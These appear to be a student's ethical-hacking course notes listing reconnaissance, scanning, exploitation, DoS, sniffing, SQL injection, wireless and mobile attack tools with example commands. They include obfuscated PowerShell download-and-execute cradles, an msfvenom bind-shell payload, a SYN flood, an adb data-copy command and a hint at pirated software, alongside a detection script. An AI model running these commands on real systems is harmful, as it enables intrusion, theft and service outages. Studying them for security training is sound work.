
These notes cover the "tools" the instructor demoed in class.
Built-in system commands and basic operations are not recorded here.
Tools that everyone already uses to death are not repeated here either.

ls -al

Reconnaissance Techniques

footprinting reconnaissance

netcraft

theHarvester

theHarvester -d DOMAIN_NAME -l RESULT_LIMIT -b SEARCH_ENGINE

web history

whois

whois DOMAIN_NAME

traceroute

traceroute DOMAIN_NAME

Recon-ng framework

recon-ng marketplace install all

Marketplace search

[recon-ng][default] > marketplace search ssl

More info

[recon-ng][default] > marketplace info ssltools

Load module

[recon-ng][default] > modules load hackertarget
[recon-ng][default][hackertarget] > 

Set source

[recon-ng][default][hackertarget] > show options

Set the source to the target domain name

[recon-ng][default][hackertarget] > options set SOURCE tesla.com
SOURCE => tesla.com

Use the info command; it shows that the current value has changed to tesla.com

[recon-ng][default][hackertarget] > info

Use input to see what the module will take as its input

[recon-ng][default][hackertarget] > input

Run the module

[recon-ng][default][hackertarget] > run

Show hosts

[recon-ng][default][hackertarget] > show hosts

whatweb

whatweb DOMAIN_NAME

OSINT map

scanning networks

hping3

| Function | Command | Description |
|---|---|---|
| Ping-like | hping3 -1 <target IP> | Send ICMP echo requests to ping the target. |
| SYN scan | hping3 -S <target IP> -p <target port range> | TCP SYN scan to check which ports are open. |
| Spoofed source IP | hping3 -a <spoofed source IP> -S <target IP> -p <target port> | Send SYN packets with a forged source IP address. |
| UDP scan | hping3 -2 <target IP> -p <target port> | Send UDP packets to the specified port. |
| Traceroute | hping3 --traceroute -V -1 <target IP> | Perform a traceroute-like operation. |
| Flood test | hping3 -S <target IP> -p <target port> --flood | Send a large number of SYN packets to the target port as a flood test. |
| Packet size | hping3 -S <target IP> -p <target port> -d <packet size> | Set the packet size (in bytes). |
| Packet count | hping3 -S <target IP> -p <target port> -c <packet count> | Send the specified number of packets. |
| Specific TCP flags | hping3 -F -P -U <target IP> -p <target port> | Send TCP packets with the FIN, PUSH and URG flags set. |

nmap

| Nmap flag | Description |
|---|---|
| -sV | Service version detection; useful for follow-up vulnerability scanning. |
| -p <x> or -p- | Scan specific ports or all ports; quickly focuses on the target services. |
| -Pn | Use when the target may block ping; skips host discovery and forces the port scan. |
| -A | Aggressive scan: OS detection, version detection and the default scripts; suited to a comprehensive assessment. |
| -sC | Run the default scripts to quickly gather common vulnerability and configuration information; suited to a quick initial assessment. |
| -v | Verbose output on the scan process; helps track progress and diagnose problems. |
| -sU | Scan UDP ports to identify less common services; for a complete network assessment. |
| -sS | Half-open (SYN) scan, fast and relatively stealthy; suited to scanning many ports. |
| --top-ports <N> | Scan only the N most common ports to save time and get the key information. |
| --script <script-name> | Run a specific Nmap script for custom checks against a particular vulnerability or configuration. |
| -oA <output-basename> | Save the results in all output formats for later analysis and reporting. |
| -T4 | Speed up the scan; suited to a LAN or when scan time is limited. |
| -D RND:<n> | Use n random decoy source IPs. |
| --spoof-mac 0 | Spoof the MAC address (0 = random). |

enumeration

nmap, the all-purpose tool

Find the NSE scripts for a protocol (quoted so the shell does not expand the wildcard):

locate "*PROTOCOL*.nse"

nmap --script=SCRIPT_NAME TARGET

snmp-check (port 161 open)

snmp-check DOMAIN_NAME

ismtp (port 25 open)

ismtp -h HOST -e /usr/share/wordlists/metasploit/unix_users.txt
ismtp -f smtp-ips.txt -e /usr/share/wordlists/metasploit/unix_users.txt

enum4linux (port 445 open)

enum4linux IP_ADDRESS

System Hacking Phases and Attack Techniques

vulnerability analysis

NVD

CWE

OpenVAS / GVM (software)

nikto (for web "server")

nikto -h IP_ADDRESS

system hacking

responder

responder -I eth0 -wrf

msfvenom

msfvenom -p windows/shell_hidden_bind_tcp AHOST=IP_ADDRESS LPORT=PORT_NUMBER -f exe > spy.exe

malware threats

obfuscation

,;cmd.exe,/c,;,echo;powershell.exe -NoExit -exec bypass -nop Invoke-Expression(New-Object System.Net.WebClient).DownloadString(‘https://targetwebsite.com”)&&echo,exit
C:\WINDOWS\system32\cmd.exe /c p^^o^^w^^e^^r^^s^^h^^e^^l^^l^^.^^e^^x^^e -No^^Exit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient). DownloadString((‘https://targetwebsite.com”)&&echo,exit
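The caret and delimiter tricks in the two command lines above are there to defeat a plain substring match on `powershell.exe`. As an added detection example (my code, not from the course notes): normalise a process command line the way cmd.exe would before matching. The sample command lines are constructed from the two lines above (with straight quotes), and the indicator list is an assumption made for this example.

```python
import re

# Constructed sample process command lines (not from any real host): the two
# obfuscated download cradles from the notes above, plus one benign line.
SAMPLE_CMDLINES = [
    ',;cmd.exe,/c,;,echo;powershell.exe -NoExit -exec bypass -nop '
    'Invoke-Expression(New-Object System.Net.WebClient)'
    '.DownloadString("https://targetwebsite.com")&&echo,exit',
    'C:\\WINDOWS\\system32\\cmd.exe /c p^^o^^w^^e^^r^^s^^h^^e^^l^^l^^.^^e^^x^^e '
    '-No^^Exit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient). '
    'DownloadString(("https://targetwebsite.com")&&echo,exit',
    'C:\\WINDOWS\\system32\\cmd.exe /c dir C:\\Users',
]

# Indicators a naive substring rule would look for; the obfuscation targets
# exactly these. Hypothetical list chosen for this example.
CRADLE_INDICATORS = ("powershell", "-exec bypass", "downloadstring", "invoke-expression")


def normalize_cmdline(cmdline: str) -> str:
    """Undo the two cmd.exe tricks shown above before matching.

    1. Drop every '^' (cmd.exe's escape character). Removing all carets is a
       deliberate simplification: it works no matter how many cmd.exe parsing
       layers the string was meant to pass through.
    2. Collapse cmd.exe token delimiters (',', ';', '=', tab, runs of spaces)
       to one space, so ',;cmd.exe,/c' reads as 'cmd.exe /c'.
    """
    s = cmdline.replace("^", "")
    s = re.sub(r"[,;=\t ]+", " ", s)
    return s.strip().lower()


def cradle_indicators(cmdline: str) -> list:
    """Return the indicators present after normalisation (empty list = no hit)."""
    norm = normalize_cmdline(cmdline)
    return [ind for ind in CRADLE_INDICATORS if ind in norm]


def is_suspicious(cmdline: str) -> bool:
    """Flag lines that reference powershell plus at least one download/exec indicator."""
    hits = cradle_indicators(cmdline)
    return "powershell" in hits and len(hits) >= 2


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(is_suspicious(line), normalize_cmdline(line)[:70])
```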

analysis

anyrun

virustotal

PeStudio

Tcpview

Network and Perimeter Hacking

sniffing

MAC Flooding

macof

sudo macof

social engineering

setoolkit

setoolkit

denial-of-service

hping3

hping3 --flood --rand-source -S -p 80 DOMAIN_NAME

LOIC

session hijacking

hunt

parrot@G:~/hunt-1.5$ sudo ./hunt
/*
 *      hunt 1.5
 *      multipurpose connection intruder / sniffer for Linux
 *      (c) 1998-2000 by kra
 */
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u)     host up tests
a)     arp/simple hijack (avoids ack storm if arp used)
s)     simple hijack
d)     daemons rst/arp/sniff/mac
o)     options
x)     exit
->    

evading IDS firewalls honeypots

Theory only (no demo)

Web Application Hacking

Hacking web server

whatweb

whatweb -v DOMAIN_NAME

netcat

nc -vv DOMAIN_NAME

nikto

nikto -h DOMAIN_NAME

gobuster

gobuster dir -u URL -w WORDLIST

hacking web application

wafw00f

wafw00f DOMAIN_NAME

wordpress login attack

burpsuitepro

As for where the Pro version came from, heh!
Security people can work that out for themselves 🙃

msfconsole

msf6 auxiliary(scanner/http/wordpress_login_enum) > options

Module options (auxiliary/scanner/http/wordpress_login_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   ANONYMOUS_LOGIN      false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS      false            no        Try blank passwords for all users
   BRUTEFORCE           true             yes       Perform brute force authentication
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false            no        Add all passwords in the current database to the list
   DB_ALL_USERS         false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING     none             no        Skip existing credentials stored in the current database (Accepted: none, user,
                                                   user&realm)
   ENUMERATE_USERNAMES  true             yes       Enumerate usernames
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RANGE_END            10               no        Last user id to enumerate
   RANGE_START          1                no        First user id to enumerate
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
                                                   /using-metasploit.html
   RPORT                80               yes       The target port (TCP)
   SSL                  false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   TARGETURI            /                yes       The base path to the wordpress application
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME                              no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false            no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   VALIDATE_USERS       true             yes       Validate usernames
   VERBOSE              true             yes       Whether to print output for all attempts
   VHOST                                 no        HTTP server virtual host

sql injection

sqlmap

sqlmap -u URL --dbs
sqlmap -u URL -D DBNAME --tables
sqlmap -u URL -D DBNAME -T TBNAME --dump

Wireless Network Hacking

hacking wireless networks

aircrack-ng

aircrack-ng FILE
aircrack-ng -w WORDLIST FILE

Mobile Platform, IoT, and OT Hacking

hacking mobile platforms

adb

adb connect IP_ADDRESS:PORT
adb -s IP_ADDRESS:PORT shell
scp -r /data USER@IP_ADDRESS:/work

IoT OT hacking

Theory only

Cloud Computing

cloud computing

Theory only

Cryptography

cryptography

one way hash

echo 123 > file
sha1sum file